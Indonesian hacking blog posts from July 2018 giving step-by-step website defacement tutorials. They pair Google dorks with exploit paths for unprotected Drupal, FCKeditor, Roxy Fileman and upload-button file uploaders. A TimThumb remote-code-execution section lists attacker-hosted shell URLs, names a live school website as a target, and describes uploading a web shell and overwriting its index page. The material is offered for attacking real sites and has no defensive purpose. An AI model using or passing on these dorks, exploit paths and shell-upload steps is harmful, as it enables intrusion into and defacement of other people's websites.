Senin, 30 Juli 2018

Deface Drupal Hidden

on   with 1 komentar
Cara deface website menggunakan metode 
drupal hidden uploader



Hai guys, sudah lama nggak buat artikel tentang deface lagi ya hehe, kali ini gw akan membawakan tutorial deface
dengan metode Drupal Hidden Uploader
Okey Langsung Aja

Dork :

allowed file type txt jpg html gif site:
allowed file types: png gif jpg txt site:gov
allowed file types: png gif jpg txt site:com
allowed file types: png gif jpg txt site:edu
( Site Bisa Ditambahkan Domain Negara Yang Di Inginkan
Contoh : id,uk.au.jp,il,br.bz.eu. Dan Lain Lain

1. Dorking Dulu Di Google


2. Kalian Pilih Salah Satu Web & Klik Choose File

3. Pilih Script Deface Kalian Dan Klik Upload
4. Jika Sudah Nanti Tampilan Seperti Di Gambar Lalu Kalian Klik Kanan / Klik File Yang Tadi Kalian Upload


5.klik file sciprt kalian dan BUUUUM 


Ok sekian ,, Nantikan tutor selanjutnya,,,,
#klewas klewes penting sukses
#Ghost Hunter Illusion
Share:

Senin, 16 Juli 2018

Cara Deface Metode FCKeditor New

on   with Tidak ada komentar

Deface website dengan teknik fckeditor 
Hasil gambar untuk gambar sagiri kawaii 


Selamat Malam Semua

Kali ini Kita Akan Mempelajari Teknik Deface Metode FCKeditor
Sebelum Itu Kita Siapkan Dulu Bumbunya;v

-Script Deface
-Dork:
inurl:advert_detail.php?id=
-Exploit:
http:///www.site.co.li /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Pertama Cari Target Dengan Google Dork



Pilih Salah Satu Web Target Lalu Masukkan Exploit Seperti Contoh Dibawah Ini


Kemudian Klik Tulisan Browse...Pilih Script Html Anda
Selah Itu Klik Upload dibawah pojok kanan;v,,

Cara Melihat Hasil Deface Anda Dengan Cara Klik http://www.site.co.li/files/namascript.html


Sekian Tutor Dari Saya Semoga Bermanfaat 😁
Selamat Malam Dan Sampai Jumpa....

salam dari team kami

🛡 Banyumas Cyber Team 🛡

Share:

Cara Deface Dengan Roxy Fileman File Upload

on   with Tidak ada komentar
Tutorial Deface Website RFM

Hasil gambar untuk gambar anime sagiri kawaii


Assalamualaiku gan ,

Kali Ini Saya Akan Bahas Tentang Cara Deface Dengan
Roxy Fileman File Upload,
Caranya Hampir Mirip Si Dengan
cara-deface-dengan-ajax-file-manager
oke langsung saja ya,

Dork
"intitle:"Roxy file manager" Copy Kan Dork Ke Mbah Google
 Kemudian Kita Cari Targetnya, Kalau Vuln Hasilnya Kayak Gini



Terus Kalau Mau Upload Script, Klik Add file , terus upload deh script mu



Kalau Mau Lihat Cari Scriptmu Dan Klik Preview, Hasilnya Seperti Ini



Cukup Sekian Iya Tutorial Dari Gw,, Gampang Kan??,, Jika Ada Yang Ditanyakan Silahkan Berkomentar, Bye Sampe Jumpa Di Tutorial Berikutnya Dari Saya

Wassalamualikum.

salam dari team kami

🛡 Banyumas Cyber Team 🛡

Share:

Rabu, 11 Juli 2018

Deface Upload Button

on   with Tidak ada komentar
Halo gaes .


Hasil gambar untuk gambar eromanga sensei imut


Falka akan Sharing Tutorial Deface Dengan Upload Button.
Yups Old But Gold untuk Newbie xixixi
langsung saja

Bahan pertempuran:
-Dork
-Jomblo
+ tamvan
-Skill
-Sabar
-Script Deface
-Koneksi Internet

Pertama :
 Kalian Dorking Dengan
 inurl:/examples/uploadbutton.html << Bisa di kembangkan menurut imajinasi lo >>

Dork dan Pilih Salah Satu aja , gak semua itu web bisa di upload .html


Kedua :
Masuk aja Nanti Ada uploader
Kalian Klik Button Upload , Dan Masukkan Script Kalian


Ketiga :
Nanti Hasil url Script nya akan nampak



Akses Hasil Deface nya
www.webnyatadi.co.li/url yang kalian dapet tadi
atau www.webnyatadi.co.li/[path]/url yang kalian dapet tadi

Sekian Tutorial nya :) , See You Next Time.

Klo masih gk paham lngsng chat wa saya saja DISINI

#Darkness Cyber Team
#Banyumas Cyber Team
Share:

Selasa, 10 Juli 2018

Deface Fckeditor

on   with Tidak ada komentar
DEFACE TIMTHUMB RCE



Kuy Kali Ini Kita Bahas Deface Dengan Metode Timthumb RCE
Pertama" Siapkan Dorknya Ama Exploitnya .. (Exploitnya Beda Beda Gan.. Kita Tinggal Liat
Versinya dolo ea:<)..

- Drok : inurl:timthumb.php?src= (selebihnya kembangin yah)

- Exploit :
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (uploader versi 1.9)
?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php (private shell versi 1.30)
?scr=http://flickr.com.x-groups.org/Nur.php (versi 1.20 kebawah)
Sudah diuji coba oleh android by Nurmala And W3LL SQUAD Passnya 22 ok :)

Live Target :
http://mamnonsunrise.edu.vn
Pertama Kita Dork Dulu Digoogle Dulu :(


Berhubung Gw Udh Ada Targetnya Langsung Aja Gan Kita Sikat:(..



Lah Keluar Versinya Kan?? Kuy Tinggal Tambahkan Exploit 1.30
http://mamnonsunrise.edu.vn/timthumb.php?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php

Kemudian Kita Copy Mulai Dari ./cache sampek php contohnya :
http://mamnonsunrise.edu.vn/cache/external_766fc9ebc1c710f9dda399c2256bea00.php
kemudian pasti akan ada tempat upload shellnya


Pilih shell kalian terus upload,, 


Kemudian Cari Index.html Atau Index.php... Trs kalian Edit Dan Tumpuk Dengan Script Deface
kalian.. Dan Otomatis web sudah ketebas:v... Kalau kalian Baik Jangan lupa Backup Dulu indexnya,, Kasian Adminnya Vvq:v,,,,
OK SAMPEK SINI DULU YA,, CHAT GW AJA 083831973261,, HWHWHW;v
Share: